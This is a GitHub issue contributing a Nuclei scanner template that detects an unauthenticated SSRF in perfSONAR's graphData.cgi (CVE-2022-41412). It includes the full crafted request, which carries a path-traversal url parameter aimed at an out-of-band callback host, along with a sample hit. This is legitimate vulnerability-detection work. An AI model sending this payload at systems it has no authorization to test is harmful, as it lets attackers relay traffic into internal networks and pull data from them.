[nuclei-template] CVE-2022-41412 perfSONAR 4.x-4.4.4 - SSRF
null-hyp0thesis opened this issue · comments
Template Information:
PerfSONAR includes by default a graphData.cgi script, used to graph and visualize data.
There is a flaw in graphData.cgi URL parsing, which allows for unauthenticated users to proxy and relay HTTP/HTTPS traffic through the perfSONAR server.
The vulnerability can potentially be leveraged to exfiltrate or enumerate data from internal web servers.
This vulnerability was patched in perfSONAR version 4.4.5.
Versions 4.0 through 4.4.4 inclusive are affected.
There is a whitelisting function that can mitigate it, but it is disabled by default.
References:
https://github.com/renmizo/CVE-2022-41412
perfsonar/graphs@463e1d9
https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
Nuclei Template:
id: CVE-2022-41412
info:
name: SSRF via perfSONAR > 4.x <= 4.4.4
author: null_hypothesis
severity: high
reference:
- https://github.com/renmizo/CVE-2022-41412
- https://hackerone.com/reports/2445802
- https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb
- https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
metadata:
max-request: 1
tags: ssrf, perfsonar, cve2022
http:
- method: GET
path:
- "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url={{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
Example Results:
[CVE-2022-41412] [http] [high] https://example.com/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://xxx.oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
It's my first Issue so be gentle :)
PR (#9497)
Thanks so much for this @jamboro , we appreciate it. And congrats on your first issue! :)